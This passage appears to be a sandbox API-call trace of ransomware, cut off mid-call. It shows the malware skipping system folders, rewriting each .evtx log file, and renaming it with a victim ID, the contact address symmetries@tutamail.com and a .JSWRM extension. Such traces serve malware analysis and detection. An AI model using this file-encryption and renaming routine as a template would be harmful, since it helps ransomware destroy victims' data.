(lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.679] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.680] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0065.680] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.685] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.686] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0065.686] CloseHandle (hObject=0x450) returned 1 [0065.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0065.687] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0065.687] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0065.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0065.687] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0065.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0065.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0065.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0065.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0065.688] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f848 [0065.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0065.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0065.688] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0065.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0065.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0065.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0065.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0065.689] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ca2fbd, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ca2fbd, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", cAlternateFileName="MIA934~1.EVT")) returned 1 [0065.689] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", lpString2=".") returned 1 [0065.689] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", lpString2="..") returned 1 [0065.689] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", lpString2="...") returned 1 [0065.689] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", lpString2="windows") returned -1 [0065.689] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", lpString2="recovery") returned -1 [0065.689] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", lpString2="perflogs") returned -1 [0065.689] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", lpString2="documents and settings") returned 1 [0065.689] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.689] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", lpString2="system volume information") returned -1 [0065.689] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", lpString2="msocache") returned -1 [0065.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0065.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0065.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0065.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", cchWideChar=49, lpMultiByteStr=0x20e268, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", lpUsedDefaultChar=0x0) returned 49 [0065.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0065.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0065.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0065.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0065.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", cchWideChar=49, lpMultiByteStr=0x20e418, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", lpUsedDefaultChar=0x0) returned 49 [0065.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0065.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0065.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0065.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0065.689] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.689] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.690] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0065.690] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.702] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.702] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0065.702] CloseHandle (hObject=0x450) returned 1 [0065.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0065.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0065.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0065.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0065.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0065.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0065.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0065.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0065.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0065.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f720 [0065.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0065.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0065.704] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0065.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0065.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0065.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0065.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0065.705] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5071f8b0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5071f8b0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", cAlternateFileName="MIB32D~1.EVT")) returned 1 [0065.705] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", lpString2=".") returned 1 [0065.705] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", lpString2="..") returned 1 [0065.705] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", lpString2="...") returned 1 [0065.705] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", lpString2="windows") returned -1 [0065.705] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", lpString2="recovery") returned -1 [0065.705] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", lpString2="perflogs") returned -1 [0065.705] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", lpString2="documents and settings") returned 1 [0065.705] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.705] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", lpString2="system volume information") returned -1 [0065.705] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", lpString2="msocache") returned -1 [0065.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0065.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0065.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0065.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", cchWideChar=48, lpMultiByteStr=0x20e268, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", lpUsedDefaultChar=0x0) returned 48 [0065.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0065.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0065.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0065.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0065.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", cchWideChar=48, lpMultiByteStr=0x20de78, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", lpUsedDefaultChar=0x0) returned 48 [0065.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0065.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0065.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0065.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0065.706] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.706] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=1052672) returned 1 [0065.706] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2481b0 [0065.706] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x27100, lpOverlapped=0x0) returned 1 [0065.721] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.721] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x27100, lpOverlapped=0x0) returned 1 [0065.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0065.722] CloseHandle (hObject=0x450) returned 1 [0065.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0065.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0065.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0065.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0065.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0065.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0065.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0065.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0065.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0065.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f5f8 [0065.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0065.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0065.755] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0065.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0065.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0065.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0065.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0065.761] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8ebf6d7, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc8ebf6d7, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", cAlternateFileName="MICA77~1.EVT")) returned 1 [0065.761] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", lpString2=".") returned 1 [0065.761] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", lpString2="..") returned 1 [0065.761] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", lpString2="...") returned 1 [0065.761] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", lpString2="windows") returned -1 [0065.761] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", lpString2="recovery") returned -1 [0065.761] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", lpString2="perflogs") returned -1 [0065.761] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", lpString2="documents and settings") returned 1 [0065.761] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.761] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", lpString2="system volume information") returned -1 [0065.761] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", lpString2="msocache") returned -1 [0065.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0065.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0065.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0065.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", cchWideChar=56, lpMultiByteStr=0x20e268, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", lpUsedDefaultChar=0x0) returned 56 [0065.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0065.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0065.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 